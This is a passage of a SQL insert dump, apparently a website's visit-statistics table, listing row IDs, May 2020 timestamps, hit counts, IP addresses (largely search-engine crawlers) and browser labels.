r'),(507299,1590124339,2,2,0,0,'66.249.70.70','chrome'),(507300,1590124350,8,8,0,0,'77.120.98.235','other'),(507301,1590124520,1,1,0,0,'178.154.200.220','other'),(507302,1590124717,1,1,0,0,'178.154.200.236','other'),(507303,1590124834,1,1,0,0,'66.249.64.38','chrome'),(507304,1590125753,1,1,0,0,'207.46.13.210','other'),(507305,1590126288,1,1,0,0,'66.249.70.69','chrome'),(507306,1590126397,1,1,0,0,'8.29.198.27','other'),(507307,1590126543,1,1,0,0,'157.55.39.225','other'),(507308,1590126683,1,1,0,0,'8.29.198.25','other'),(507309,1590126897,8,8,0,0,'77.120.98.235','other'),(507310,1590127731,1,1,0,0,'95.132.52.158','chrome'),(507311,1590128196,1,1,0,0,'94.45.44.85','chrome'),(507312,1590128935,1,1,0,0,'188.243.213.11','firefox'),(507313,1590129079,1,1,0,0,'94.153.6.236','chrome'),(507314,1590129270,1,1,0,0,'91.196.177.228','chrome'),(507315,1590129345,1,1,0,0,'91.196.177.229','chrome'),(507316,1590129494,1,1,0,0,'66.249.70.69','chrome'),(507317,1590129519,8,8,0,0,'77.120.98.235','other'),(507318,1590129568,1,1,0,0,'207.46.13.210','other'),(507319,1590130467,8,8,0,0,'66.249.70.70','chrome'),(507320,1590130470,3,3,0,0,'66.249.70.72','chrome'),(507321,1590130473,35,34,1,0,'66.249.70.69',''),(507322,1590130547,3,3,0,0,'66.249.64.36','chrome'),(507323,1590130914,1,1,0,0,'66.249.64.38','chrome'),(507324,1590130965,1,1,0,0,'78.154.160.206','chrome'),(507325,1590130975,2,2,0,0,'66.249.64.33','chrome'),(507326,1590131143,3,3,0,0,'66.249.70.69','chrome'),(507327,1590131275,1,1,0,0,'213.180.203.16','other'),(507328,1590131385,1,1,0,0,'131.220.6.152','chrome'),(507329,1590131747,2,2,0,0,'66.249.70.70','chrome'),(507330,1590131830,4,4,0,0,'66.249.70.72','chrome'),(507331,1590132117,20,20,0,0,'66.249.70.69','chrome'),(507332,1590132127,8,8,0,0,'77.120.98.235','other'),(507333,1590132179,2,2,0,0,'66.249.64.33','chrome'),(507334,1590132219,3,3,0,0,'66.249.64.36','chrome'),(507335,1590132259,2,2,0,0,'207.46.13.81','other'),(507336,1590132263,1,1,0,0,'207.46.13.72','other'),(507337,1590132810,5,5,0,0,'66.249.64.38','chrome'),(507338,1590132811,7,7,0,0,'66.249.70.72','chrome'),(507339,1590132820,10,10,0,0,'66.249.70.70','chrome'),(507340,1590133022,41,41,0,0,'66.249.70.69','chrome'),(507341,1590133090,7,7,0,0,'66.249.64.33','chrome'),(507342,1590133545,1,1,0,0,'66.249.73.165','chrome'),(507343,1590133759,2,2,0,0,'66.249.64.36','chrome'),(507344,1590133897,1,1,0,0,'91.196.178.39','chrome'),(507345,1590133899,3,3,0,0,'66.249.70.70','chrome'),(507346,1590134009,1,1,0,0,'207.46.13.81','other'),(507347,1590134462,1,1,0,0,'52.201.221.156','other'),(507348,1590134725,8,8,0,0,'77.120.98.235','other'),(507349,1590134729,5,5,0,0,'66.249.70.69','chrome'),(507350,1590134930,4,4,0,0,'66.249.70.70','chrome'),(507351,1590135240,2,2,0,0,'66.249.70.72','chrome'),(507352,1590136022,1,1,0,0,'95.216.4.19','chrome'),(507353,1590136253,2,2,0,0,'213.180.203.16','other'),(507354,1590136543,2,2,0,0,'66.249.70.70','chrome'),(507355,1590136622,1,1,0,0,'66.249.70.72','chrome'),(507356,1590136815,2,2,0,0,'66.249.70.69','chrome'),(507357,1590137221,2,2,0,0,'8.29.198.26','other'),(507358,1590137299,8,8,0,0,'77.120.98.235','other'),(507359,1590137315,1,1,0,0,'157.55.39.225','other'),(507360,1590137915,1,1,0,0,'66.249.64.33','chrome'),(507361,1590137946,1,1,0,0,'66.249.70.70','chrome'),(507362,1590137991,1,1,0,0,'91.196.178.137','firefox'),(507363,1590138370,1,1,0,0,'66.249.70.72','chrome'),(507364,1590138376,1,1,0,0,'66.249.70.69','chrome'),(507365,1590139000,1,1,0,0,'91.196.178.161','chrome'),(507366,1590139253,1,1,0,0,'66.249.64.36','chrome'),(507367,1590139315,1,1,0,0,'66.249.70.70','chrome'),(507368,1590139640,7,7,0,0,'66.249.70.69','chrome'),(507369,1590139886,8,8,0,0,'77.120.98.235','other'),(507370,1590139922,2,2,0,0,'66.249.64.33','chrome'),(507371,1590140068,1,1,0,0,'66.249.64.38','chrome'),(507372,1590140268,1,1,0,0,'77.75.150.134','chrome'),(507373,1590140692,1,1,0,0,'66.249.70.69','chrome'),(507374,1590141462,1,1,0,0,'66.249.70.70','chrome'),(507375,1590141733,1,1,0,0,'66.249.64.48','chrome'),(507376,1590141740,2,2,0,0,'207.46.13.72','other'),(507377,1590141821,1,1,0,0,'3.235.178.0','chrome'),(507378,1590142169,4,4,0,0,'66.249.70.69','chrome'),(507379,1590142365,1,1,0,0,'66.249.70.72','chrome'),(507380,1590142444,1,1,0,0,'66.249.70.70','chrome'),(507381,1590142461,1,1,0,0,'213.180.203.16','other'),(507382,1590142528,1,1,0,0,'66.249.64.33','chrome'),(507383,1590143529,8,8,0,0,'77.120.98.235','other'),(507384,1590143700,5,5,0,0,'66.249.70.69','chrome'),(507385,1590143913,1,1,0,0,'207.46.13.72','other'),(507386,1590144020,1,1,0,0,'66.249.64.38','chrome'),(507387,1590144084,1,1,0,0,'66.249.64.33','chrome'),(507388,1590144133,1,1,0,0,'207.46.13.81','other'),(507389,1590144297,1,1,0,0,'91.196.178.52','chrome'),(507390,1590144319,1,1,0,0,'66.249.70.72','chrome'),(507391,1590144573,1,1,0,0,'66.249.64.36','chrome'),(507392,1590144820,1,1,0,0,'66.249.70.69','chrome'),(507393,1590145645,1,1,0,0,'94.153.49.186','chrome'),(507394,1590145922,1,1,0,0,'109.74.154.72','chrome'),(507395,1590145951,1,1,0,0,'66.249.70.70','chrome'),(507396,1590146575,1,1,0,0,'157.55.39.225','other'),(507397,1590146843,8,8,0,0,'77.120.98.235','other'),(507398,1590147018,1,1,0,0,'66.249.64.33','chrome'),(507399,1590147202,1,1,0,0,'88.155.31.171','chrome'),(507400,1590147417,3,3,0,0,'66.249.70.69','chrome'),(507401,1590147670,1,1,0,0,'66.249.70.72','chrome'),(507402,1590147897,1,1,0,0,'207.46.13.72','other'),(507403,1590148043,1,1,0,0,'8.29.198.25','other'),(507404,1590148160,1,1,0,0,'94.153.11.135','chrome'),(507405,1590148339,1,1,0,0,'8.29.198.26','other'),(507406,1590148524,4,4,0,0,'66.249.70.69','chrome'),(507407,1590148604,1,1,0,0,'91.196.178.161','chrome'),(507408,1590148655,4,4,0,0,'66.249.70.72','chrome'),(507409,1590148837,1,1,0,0,'207.46.13.81','other'),(507410,1590149205,1,1,0,0,'157.55.39.225','other'),(507411,1590149217,2,2,0,0,'91.196.177.228','chrome'),(507412,1590149261,1,1,0,0,'66.249.64.36','chrome'),(507413,1590149414,3,3,0,0,'66.249.70.70','chrome'),(507414,1590149580,7,7,0,0,'66.249.70.69','chrome'),(507415,1590149673,8,8,0,0,'77.120.98.235','other'),(507416,1590150100,1,1,0,0,'94.232.215.77','chrome'),(507417,1590150116,2,2,0,0,'66.249.70.72','chrome'),(507418,1590150311,1,1,0,0,'157.55.39.225','other'),(507419,1590150510,1,1,0,0,'66.249.64.38','chrome'),(507420,1590150521,1,1,0,0,'66.249.70.70','chrome'),(507421,1590150526,5,5,0,0,'66.249.70.69','chrome'),(507422,1590150620,1,1,0,0,'178.154.200.222','other'),(507423,1590150628,1,1,0,0,'66.249.64.36','chrome'),(507424,1590150633,2,2,0,0,'66.249.64.33','chrome'),(507425,1590150826,1,1,0,0,'91.196.177.228','chrome'),(507426,1590151290,1,1,0,0,'207.46.13.81','other'),(507427,1590151500,2,1,1,0,'66.249.70.70',''),(507428,1590151957,4,4,0,0,'66.249.70.69','chrome'),(507429,1590151977,2,2,0,0,'66.249.70.70','chrome'),(507430,1590152335,1,1,0,0,'5.44.174.37','chrome'),(507431,1590152449,8,8,0,0,'77.120.98.235','other'),(507432,1590152533,1,1,0,0,'194.61.24.94','other'),(507433,1590152979,1,1,0,0,'178.154.200.222','other'),(507434,1590153245,1,1,0,0,'95.132.133.4','chrome'),(507435,1590153852,1,1,0,0,'207.46.13.72','other'),(507436,1590153876,1,1,0,0,'91.196.177.228','chrome'),(507437,1590153944,1,1,0,0,'91.196.178.161','chrome'),(507438,1590154676,1,1,0,0,'207.46.13.81','other'),(507439,1590154771,1,1,0,0,'207.46.13.72','other'),(507440,1590155191,8,8,0,0,'77.120.98.235','other'),(507441,1590155623,1,1,0,0,'207.46.13.81','other'),(507442,1590156364,1,1,0,0,'66.249.70.69','chrome'),(507443,1590156454,1,1,0,0,'91.196.177.228','chrome'),(507444,1590157257,2,2,0,0,'157.55.39.166','other'),(507445,1590157414,1,1,0,0,'66.249.64.38','chrome'),(507446,1590157619,1,1,0,0,'178.154.200.222','other'),(507447,1590157989,8,8,0,0,'77.120.98.235','other'),(507448,1590158566,1,1,0,0,'66.249.64.33','chrome'),(507449,1590158865,1,1,0,0,'8.29.198.26','other'),(507450,1590159162,1,1,0,0,'8.29.198.27','other'),(507451,1590159532,1,1,0,0,'91.196.178.21','chrome'),(507452,1590160002,1,1,0,0,'207.46.13.81','other'),(507453,1590160163,1,1,0,0,'178.154.200.220','other'),(507454,1590160802,8,8,0,0,'77.120.98.235','other'),(507455,1590161291,1,1,0,0,'207.46.13.81','other'),(507456,1590161883,1,1,0,0,'178.154.200.222','other'),(507457,1590161958,1,1,0,0,'157.55.39.166','other'),(507458,1590162864,1,1,0,0,'157.55.39.166','other'),(507459,1590163367,1,1,0,0,'213.180.203.16','other'),(507460,1590163608,8,8,0,0,'77.120.98.235','other'),(507461,1590163623,1,1,0,0,'178.154.200.220','other'),(507462,1590164128,1,1,0,0,'66.249.70.70','chrome'),(507463,1590164659,1,1,0,0,'178.154.200.220','other'),(507464,1590164877,1,1,0,0,'95.216.4.19','chrome'),(507465,1590165058,1,1,0,0,'207.180.255.81','chrome'),(507466,1590166392,8,8,0,0,'77.120.98.235','other'),(507467,1590166752,1,1,0,0,'66.249.70.70','chrome'),(507468,1590166800,2,2,0,0,'178.154.200.222','other'),(507469,1590166984,2,2,0,0,'157.55.39.214','other'),(507470,1590167973,3,3,0,0,'178.154.200.222','other'),(507471,1590168747,4,4,0,0,'66.249.70.72','chrome'),(507472,1590168755,1,1,0,0,'66.249.70.70','chrome'),(507473,1590169028,1,1,0,0,'173.252.111.111','other'),(507474,1590169030,1,1,0,0,'173.252.111.10','other'),(507477,1590169090,1,1,0,0,'93.159.230.28','chrome'),(507478,1590169151,8,8,0,0,'77.120.98.235','other'),(507479,1590169339,1,1,0,0,'66.249.64.36','chrome'),(507480,1590169692,1,1,0,0,'8.29.198.26','other'),(507481,1590169992,1,1,0,0,'8.29.198.27','other'),(507482,1590170111,2,2,0,0,'66.249.70.70','chrome'),(507483,1590170244,2,2,0,0,'66.249.70.69','chrome'),(507484,1590170452,1,1,0,0,'178.154.200.222','other'),(507485,1590170536,2,2,0,0,'66.249.70.72','chrome'),(507486,1590170550,1,1,0,0,'66.249.64.38','chrome'),(507487,1590171460,2,2,0,0,'66.249.70.70','chrome'),(507488,1590171862,1,0,1,0,'66.249.70.69',''),(507489,1590172013,8,8,0,0,'77.120.98.235','other'),(507490,1590172111,1,1,0,0,'178.154.200.222','other'),(507491,1590172416,2,2,0,0,'66.249.70.70','chrome'),(507492,1590173010,1,1,0,0,'66.249.64.36','chrome'),(507493,1590173644,2,2,0,0,'66.249.70.69','chrome'),(507494,1590173886,1,1,0,0,'213.180.203.16','other'),(507495,1590174098,3,3,0,0,'66.249.70.70','chrome'),(507496,1590174573,3,3,0,0,'66.249.70.69','chrome'),(507497,1590174936,1,1,0,0,'66.249.70.72','chrome'),(507498,1590175118,2,2,0,0,'66.249.70.70','chrome'),(507499,1590175521,1,1,0,0,'91.196.178.88','firefox'),(507500,1590176000,3,3,0,0,'178.154.200.222','other'),(507501,1590176167,1,1,0,0,'66.249.70.70','chrome'),(507502,1590176178,2,2,0,0,'66.249.64.36','chrome'),(507503,1590176741,1,1,0,0,'66.249.70.72','chrome'),(507504,1590176752,1,1,0,0,'66.249.64.38','chrome'),(507505,1590176838,8,8,0,0,'77.120.98.235','other'),(507506,1590176915,1,1,0,0,'66.249.70.69','chrome'),(507507,1590177061,1,1,0,0,'66.249.64.33','chrome'),(507508,1590177632,1,1,0,0,'52.201.221.156','other'),(507509,1590177662,2,2,0,0,'66.249.70.70','chrome'),(507510,1590177672,1,1,0,0,'178.154.200.222','other'),(507511,1590177882,1,1,0,0,'66.249.64.36','chrome'),(507512,1590178033,4,4,0,0,'66.249.70.69','chrome'),(507513,1590178090,1,1,0,0,'66.249.64.33','chrome'),(507514,1590178635,3,3,0,0,'66.249.70.72','chrome'),(507515,1590178907,1,1,0,0,'66.249.64.36','chrome'),(507516,1590178936,1,1,0,0,'46.211.0.228','chrome'),(507517,1590178958,2,2,0,0,'66.249.70.70','chrome'),(507518,1590179124,1,1,0,0,'178.154.200.196','other'),(507519,1590179236,2,2,0,0,'157.55.39.214','other'),(507520,1590179461,1,1,0,0,'66.249.64.33','chrome'),(507521,1590179576,8,8,0,0,'77.120.98.235','other'),(507522,1590179638,1,1,0,0,'66.249.70.69','chrome'),(507523,1590179723,1,1,0,0,'66.249.70.72','chrome'),(507524,1590179992,1,1,0,0,'66.249.70.70','chrome'),(507525,1590180044,1,1,0,0,'213.180.203.16','other'),(507526,1590180523,2,2,0,0,'8.29.198.25','other'),(507527,1590180953,4,4,0,0,'66.249.70.70','chrome'),(507528,1590181176,1,1,0,0,'66.249.70.69','chrome'),(507529,1590181346,1,1,0,0,'213.180.203.16','other'),(507530,1590181489,2,2,0,0,'178.154.200.220','other'),(507531,1590182293,8,8,0,0,'77.120.98.235','other'),(507532,1590184625,2,2,0,0,'18.236.122.1','chrome'),(507533,1590184685,1,1,0,0,'66.249.70.69','chrome'),(507534,1590185012,8,8,0,0,'77.120.98.235','other'),(507535,1590185089,1,1,0,0,'66.249.70.72','chrome'),(507536,1590185826,1,1,0,0,'66.249.70.69','chrome'),(507537,1590186152,1,1,0,0,'66.249.70.70','chrome'),(507538,1590186768,1,1,0,0,'66.249.64.33','chrome'),(507539,1590186926,1,1,0,0,'66.249.70.69','chrome'),(507540,1590187141,1,1,0,0,'66.249.70.72','chrome'),(507541,1590187147,1,1,0,0,'66.249.70.70','chrome'),(507542,1590187660,8,8,0,0,'77.120.98.235','other'),(507543,1590187776,1,1,0,0,'66.249.64.38','chrome'),(507544,1590188177,1,1,0,0,'207.46.13.233','other'),(507545,1590188294,1,1,0,0,'66.249.70.69','chrome'),(507546,1590188412,1,1,0,0,'66.249.70.72','chrome'),(507547,1590188569,1,1,0,0,'66.249.70.70','chrome'),(507548,1590189296,1,1,0,0,'66.249.70.69','chrome'),(507549,1590189342,1,1,0,0,'66.249.64.36','chrome'),(507550,1590189506,1,1,0,0,'66.249.70.72','chrome'),(507551,1590190119,2,2,0,0,'66.249.70.70','chrome'),(507552,1590190264,8,8,0,0,'77.120.98.235','other'),(507553,1590191353,1,1,0,0,'8.29.198.26','other'),(507554,1590191653,1,1,0,0,'8.29.198.25','other'),(507555,1590191706,1,1,0,0,'62.205.134.182','other'),(507556,1590192115,1,1,0,0,'66.249.64.36','chrome'),(507557,1590192121,2,2,0,0,'66.249.70.72','chrome'),(507558,1590192338,1,1,0,0,'66.249.64.33','chrome'),(507559,1590192751,1,1,0,0,'178.154.200.155','other'),(507560,1590192825,8,8,0,0,'77.120.98.235','other'),(507561,1590192880,1,1,0,0,'66.249.70.69','chrome'),(507562,1590193155,2,2,0,0,'66.249.70.70','chrome'),(507563,1590193578,2,2,0,0,'66.249.64.38','chrome'),(507564,1590193790,1,1,0,0,'66.249.70.69','chrome'),(507565,1590194431,1,1,0,0,'66.249.70.72','chrome'),(507566,1590194757,2,2,0,0,'66.249.64.38','chrome'),(507567,1590195067,1,1,0,0,'66.249.70.70','chrome'),(507568,1590195373,8,8,0,0,'77.120.98.235','other'),(507569,1590195533,1,1,0,0,'66.249.70.69','chrome'),(507570,1590195569,2,2,0,0,'66.249.70.72','chrome'),(507571,1590196562,3,3,0,0,'66.249.70.70','chrome'),(507572,1590197012,1,1,0,0,'66.249.70.72','chrome'),(507573,1590197327,1,1,0,0,'66.249.64.38','chrome'),(507574,1590197383,2,2,0,0,'66.249.64.33','chrome'),(507575,1590197422,2,2,0,0,'66.249.64.36','chrome'),(507576,1590197902,1,1,0,0,'154.51.131.142','chrome'),(507577,1590197921,8,8,0,0,'77.120.98.235','other'),(507578,1590197990,1,1,0,0,'66.249.70.70','chrome'),(507579,1590197995,1,1,0,0,'66.249.70.69','chrome'),(507580,1590198597,1,1,0,0,'17.58.99.89','other'),(507581,1590198996,1,1,0,0,'66.249.70.70','chrome'),(507582,1590199007,1,1,0,0,'66.249.64.33','chrome'),(507583,1590199013,1,1,0,0,'66.249.64.36','chrome'),(507584,1590199041,1,1,0,0,'66.249.70.69','chrome'),(507585,1590200490,8,8,0,0,'77.120.98.235','other'),(507586,1590201234,1,1,0,0,'66.249.70.72','chrome'),(507587,1590201800,1,1,0,0,'66.249.70.70','chrome'),(507588,1590202181,1,1,0,0,'8.29.198.26','other'),(507589,1590202479,1,1,0,0,'8.29.198.27','other'),(507590,1590202728,2,2,0,0,'141.101.143.14','chrome'),(507591,1590203023,8,8,0,0,'77.120.98.235','other'),(507592,1590203505,1,1,0,0,'207.46.13.118','other'),(507593,1590204068,1,1,0,0,'118.31.111.216','firefox'),(507594,1590204809,1,1,0,0,'213.180.203.101','other'),(507595,1590205525,8,8,0,0,'77.120.98.235','other'),(507596,1590206186,11,11,0,0,'78.85.227.52','firefox'),(507597,1590206278,1,1,0,0,'213.180.203.16','other'),(507598,1590207984,1,1,0,0,'207.46.13.118','other'),(507599,1590208008,8,8,0,0,'77.120.98.235','other'),(507600,1590208556,1,1,0,0,'213.180.203.16','other'),(507601,1590209168,1,1,0,0,'62.205.134.182','other'),(507602,1590209876,1,1,0,0,'213.180.203.101','other'),(507603,1590210457,2,2,0,0,'178.154.200.97','other'),(507604,1590210538,8,8,0,0,'77.120.98.235','other'),(507605,1590211731,1,1,0,0,'31.13.103.116','other'),(507606,1590212776,3,3,0,0,'54.201.14.93','chrome'),(507607,1590212780,3,3,0,0,'54.201.14.93','firefox'),(507608,1590213014,2,2,0,0,'8.29.198.25','other'),(507609,1590213062,8,8,0,0,'77.120.98.235','other'),(507610,1590214348,1,1,0,0,'178.154.200.222','other'),(507611,1590215587,8,8,0,0,'77.120.98.235','other'),(507612,1590216809,1,1,0,0,'178.154.200.236','other'),(507613,1590217789,1,1,0,0,'131.220.6.152','chrome'),(507614,1590218021,1,1,0,0,'66.249.70.72','chrome'),(507615,1590218177,8,8,0,0,'77.120.98.235','other'),(507616,1590218489,1,1,0,0,'178.154.200.222','other'),(507617,1590220086,1,1,0,0,'66.249.64.38','chrome'),(507618,1590220775,8,8,0,0,'77.120.98.235','other'),(507619,1590221103,1,1,0,0,'66.249.70.70','chrome'),(507620,1590222050,1,1,0,0,'157.55.39.172','other'),(507621,1590222625,1,1,0,0,'66.249.64.36','chrome'),(507622,1590222687,4,4,0,0,'66.249.70.69','chrome'),(507623,1590222721,1,1,0,0,'66.249.70.72','chrome'),(507624,1590222979,2,2,0,0,'66.249.70.70','chrome'),(507625,1590223387,8,8,0,0,'77.120.98.235','other'),(507626,1590223543,1,1,0,0,'213.180.203.140','other'),(507627,1590223841,1,1,0,0,'8.29.198.25','other'),(507628,1590223904,2,2,0,0,'66.249.70.69','chrome'),(507629,1590224029,1,1,0,0,'178.154.200.175','other'),(507630,1590224128,1,1,0,0,'66.249.64.36','chrome'),(507631,1590224134,1,1,0,0,'8.29.198.26','other'),(507632,1590224398,1,1,0,0,'178.154.200.97','other'),(507633,1590224668,3,3,0,0,'66.249.64.33','chrome'),(507634,1590224702,5,5,0,0,'66.249.70.70','chrome'),(507635,1590224814,1,1,0,0,'178.154.200.222','other'),(507636,1590224865,3,3,0,0,'66.249.70.69','chrome'),(507637,1590225017,2,2,0,0,'66.249.70.72','chrome'),(507638,1590225175,1,1,0,0,'207.46.13.64','other'),(507639,1590225724,2,2,0,0,'157.55.39.133','other'),(507640,1590226027,8,8,0,0,'77.120.98.235','other'),(507641,1590226186,1,1,0,0,'35.172.146.236','other'),(507642,1590226254,2,2,0,0,'66.249.70.69','chrome'),(507643,1590226743,1,1,0,0,'66.249.70.72','chrome'),(507644,1590226871,1,1,0,0,'207.46.13.64','other'),(507645,1590227165,1,1,0,0,'66.249.70.70','chrome'),(507646,1590227350,1,1,0,0,'66.249.64.36','chrome'),(507647,1590227972,1,1,0,0,'173.252.111.3','other'),(507648,1590227987,1,1,0,0,'207.46.13.64','other'),(507649,1590227992,1,1,0,0,'157.55.39.172','other'),(507650,1590228148,1,1,0,0,'91.124.83.93','chrome'),(507651,1590228250,3,3,0,0,'66.249.70.69','chrome'),(507652,1590228380,1,1,0,0,'178.154.200.100','other'),(507653,1590228653,8,8,0,0,'77.120.98.235','other'),(507654,1590229425,1,1,0,0,'157.55.39.133','other'),(507655,1590230060,2,2,0,0,'66.249.70.70','chrome'),(507656,1590230125,1,1,0,0,'178.154.200.155','other'),(507657,1590230138,1,1,0,0,'66.249.70.72','chrome'),(507658,1590230258,1,1,0,0,'157.55.39.172','other'),(507659,1590231223,2,2,0,0,'157.55.39.133','other'),(507660,1590231301,8,8,0,0,'77.120.98.235','other'),(507661,1590231668,3,3,0,0,'66.249.70.69','chrome'),(507662,1590231702,2,2,0,0,'207.46.13.64','other'),(507663,1590231901,1,1,0,0,'109.74.154.72','chrome'),(507664,1590232207,2,1,1,0,'66.249.70.70',''),(507665,1590232620,2,2,0,0,'207.46.13.64','other'),(507666,1590232625,1,1,0,0,'178.154.200.72','other'),(507667,1590232843,1,1,0,0,'66.249.70.69','chrome'),(507668,1590232976,1,1,0,0,'194.61.24.94','other'),(507669,1590233004,1,1,0,0,'66.249.70.72','chrome'),(507670,1590233149,1,0,1,0,'66.249.70.70',''),(507671,1590233394,2,2,0,0,'66.249.70.70','chrome'),(507672,1590233970,8,8,0,0,'77.120.98.235','other'),(507673,1590234030,1,0,1,0,'66.249.70.72',''),(507674,1590234053,1,1,0,0,'178.154.200.222','other'),(507675,1590234214,1,1,0,0,'66.249.70.72','chrome'),(507676,1590234285,1,1,0,0,'17.58.99.89','other'),(507677,1590234557,1,1,0,0,'66.249.70.70','chrome'),(507678,1590234674,1,1,0,0,'8.29.198.25','other'),(507679,1590234969,1,1,0,0,'8.29.198.26','other'),(507680,1590235280,1,1,0,0,'17.58.99.89','other'),(507681,1590236357,2,2,0,0,'66.249.70.72','chrome'),(507682,1590236463,4,4,0,0,'66.249.70.69','chrome'),(507683,1590236627,8,8,0,0,'77.120.98.235','other'),(507684,1590236759,1,1,0,0,'178.154.200.92','other'),(507685,1590236854,4,4,0,0,'207.46.13.64','other'),(507686,1590236958,1,1,0,0,'66.249.64.38','chrome'),(507687,1590237183,1,1,0,0,'157.55.39.172','other'),(507688,1590237319,1,1,0,0,'17.58.99.89','other'),(507689,1590238037,1,1,0,0,'66.249.70.69','chrome'),(507690,1590238196,1,1,0,0,'178.154.200.72','other'),(507691,1590238461,1,1,0,0,'66.249.70.70','chrome'),(507692,1590238581,1,1,0,0,'178.154.200.41','other'),(507693,1590238615,1,1,0,0,'66.249.70.72','chrome'),(507694,1590238769,1,1,0,0,'157.55.39.172','other'),(507695,1590238822,1,1,0,0,'157.55.39.94','other'),(507696,1590239266,8,8,0,0,'77.120.98.235','other'),(507697,1590239905,1,1,0,0,'66.249.70.72','chrome'),(507698,1590240453,1,1,0,0,'157.55.39.94','other'),(507699,1590240687,2,2,0,0,'66.249.70.70','chrome'),(507700,1590240810,1,1,0,0,'66.249.70.72','chrome'),(507701,1590240878,1,1,0,0,'66.249.70.69','chrome'),(507702,1590241428,1,1,0,0,'178.154.200.119','other'),(507703,1590241558,1,1,0,0,'66.249.64.36','chrome'),(507704,1590241971,8,8,0,0,'77.120.98.235','other'),(507705,1590242120,1,1,0,0,'66.249.70.70','chrome'),(507706,1590242368,1,1,0,0,'78.137.59.123','chrome'),(507707,1590242879,1,1,0,0,'178.154.200.222','other'),(507708,1590243289,1,1,0,0,'157.55.39.94','other'),(507709,1590243348,2,2,0,0,'66.249.70.70','chrome'),(507710,1590243554,1,1,0,0,'66.249.64.36','chrome'),(507711,1590244558,1,1,0,0,'157.55.39.94','other'),(507712,1590244654,8,8,0,0,'77.120.98.235','other'),(507713,1590245190,3,3,0,0,'66.249.70.70','chrome'),(507714,1590245299,1,1,0,0,'207.46.13.64','other'),(507715,1590245354,1,0,1,0,'66.249.70.72',''),(507716,1590245508,1,1,0,0,'8.29.198.27','other'),(507717,1590245511,1,1,0,0,'66.249.70.72','chrome'),(507718,1590245789,1,1,0,0,'8.29.198.25','other'),(507719,1590246191,3,3,0,0,'66.249.70.69','chrome'),(507720,1590246564,1,1,0,0,'157.55.39.172','other'),(507721,1590246736,1,1,0,0,'207.46.13.64','other'),(507722,1590246910,2,2,0,0,'66.249.70.72','chrome'),(507723,1590247354,8,8,0,0,'77.120.98.235','other'),(507724,1590247799,1,1,0,0,'66.249.70.69','chrome'),(507725,1590248282,3,3,0,0,'66.249.70.72','chrome'),(507726,1590248441,1,1,0,0,'157.55.39.172','other'),(507727,1590248678,1,1,0,0,'207.46.13.246','other'),(507728,1590248783,1,1,0,0,'66.249.64.33','chrome'),(507729,1590248844,2,2,0,0,'66.249.70.70','chrome'),(507730,1590248974,1,1,0,0,'178.154.200.196','other'),(507731,1590249693,1,1,0,0,'66.249.70.72','chrome'),(507732,1590250097,8,8,0,0,'77.120.98.235','other'),(507733,1590250605,1,1,0,0,'207.46.13.246','other'),(507734,1590251038,1,1,0,0,'66.249.70.69','chrome'),(507735,1590252023,1,1,0,0,'66.249.70.72','chrome'),(507736,1590252134,1,1,0,0,'66.249.70.69','chrome'),(507737,1590252341,3,3,0,0,'66.249.70.70','chrome'),(507738,1590252772,8,8,0,0,'77.120.98.235','other'),(507739,1590253150,1,1,0,0,'17.58.99.84','other'),(507740,1590253348,2,2,0,0,'66.249.70.69','chrome'),(507741,1590253784,1,1,0,0,'207.46.13.246','other'),(507742,1590254187,1,1,0,0,'37.73.133.237','other'),(507743,1590255029,1,1,0,0,'66.249.70.72','chrome'),(507744,1590255453,8,8,0,0,'77.120.98.235','other'),(507745,1590255643,1,1,0,0,'62.210.91.20','firefox'),(507746,1590256334,1,1,0,0,'8.29.198.25','other'),(507747,1590256618,1,1,0,0,'8.29.198.26','other'),(507748,1590256687,1,1,0,0,'66.249.70.70','chrome'),(507749,1590257193,1,1,0,0,'66.249.70.69','chrome'),(507750,1590257412,2,2,0,0,'66.249.70.72','chrome'),(507751,1590257891,3,3,0,0,'207.46.13.246','other'),(507752,1590257920,1,1,0,0,'207.46.13.204','other'),(507753,1590258168,8,8,0,0,'77.120.98.235','other'),(507754,1590259774,1,1,0,0,'66.249.70.69','chrome'),(507755,1590260201,4,3,1,0,'66.249.70.72',''),(507756,1590260426,1,1,0,0,'17.58.99.7','other'),(507757,1590260629,1,1,0,0,'207.46.13.204','other'),(507758,1590260807,8,8,0,0,'77.120.98.235','other'),(507759,1590261747,1,1,0,0,'66.249.70.70','chrome'),(507760,1590261776,1,1,0,0,'178.154.200.20','other'),(507761,1590262398,1,1,0,0,'91.196.178.21','chrome'),(507762,1590262914,1,1,0,0,'207.46.13.64','other'),(507763,1590263051,1,1,0,0,'66.249.70.72','chrome'),(507764,1590263222,8,8,0,0,'77.120.98.235','other'),(507765,1590263328,3,3,0,0,'74.125.210.73','chrome'),(507766,1590263330,1,1,0,0,'74.125.210.73','other'),(507771,1590263331,1,1,0,0,'74.125.209.9','chrome'),(507772,1590263851,1,1,0,0,'157.55.39.172','other'),(507773,1590263928,1,1,0,0,'66.249.70.70','chrome'),(507774,1590264732,1,1,0,0,'66.249.70.72','chrome'),(507775,1590264917,1,1,0,0,'66.249.70.69','chrome'),(507776,1590265377,1,1,0,0,'207.46.13.194','other'),(507777,1590265599,8,8,0,0,'77.120.98.235','other'),(507778,1590265789,4,4,0,0,'66.249.70.72','chrome'),(507779,1590266042,1,1,0,0,'66.249.70.69','chrome'),(507780,1590266135,1,1,0,0,'5.165.206.96','chrome'),(507781,1590266690,1,1,0,0,'213.180.203.142','other'),(507782,1590266825,1,1,0,0,'93.126.78.113','firefox'),(507783,1590266874,1,1,0,0,'66.249.70.72','chrome'),(507784,1590267166,1,1,0,0,'8.29.198.25','other'),(507785,1590267302,1,1,0,0,'66.249.70.70','chrome'),(507786,1590267446,1,1,0,0,'8.29.198.27','other'),(507787,1590267984,8,8,0,0,'77.120.98.235','other'),(507788,1590268238,1,1,0,0,'207.46.13.64','other'),(507789,1590268665,1,1,0,0,'207.46.13.204','other'),(507790,1590269009,1,1,0,0,'213.180.203.70','other'),(507791,1590269410,1,1,0,0,'66.249.64.38','chrome'),(507792,1590269618,1,1,0,0,'66.249.70.72','chrome'),(507793,1590269689,1,1,0,0,'66.249.64.33','chrome'),(507794,1590270299,8,8,0,0,'77.120.98.235','other'),(507795,1590270827,2,2,0,0,'66.249.70.72','chrome'),(507796,1590271054,1,0,1,0,'66.249.64.36',''),(507797,1590271075,1,1,0,0,'66.249.64.33','chrome'),(507798,1590271218,1,1,0,0,'207.46.13.194','other'),(507799,1590271541,1,1,0,0,'66.249.64.38','chrome'),(507800,1590272595,8,8,0,0,'77.120.98.235','other'),(507801,1590273929,2,2,0,0,'207.46.13.194','other'),(507802,1590274138,1,1,0,0,'66.249.64.33','chrome'),(507803,1590274735,2,1,1,0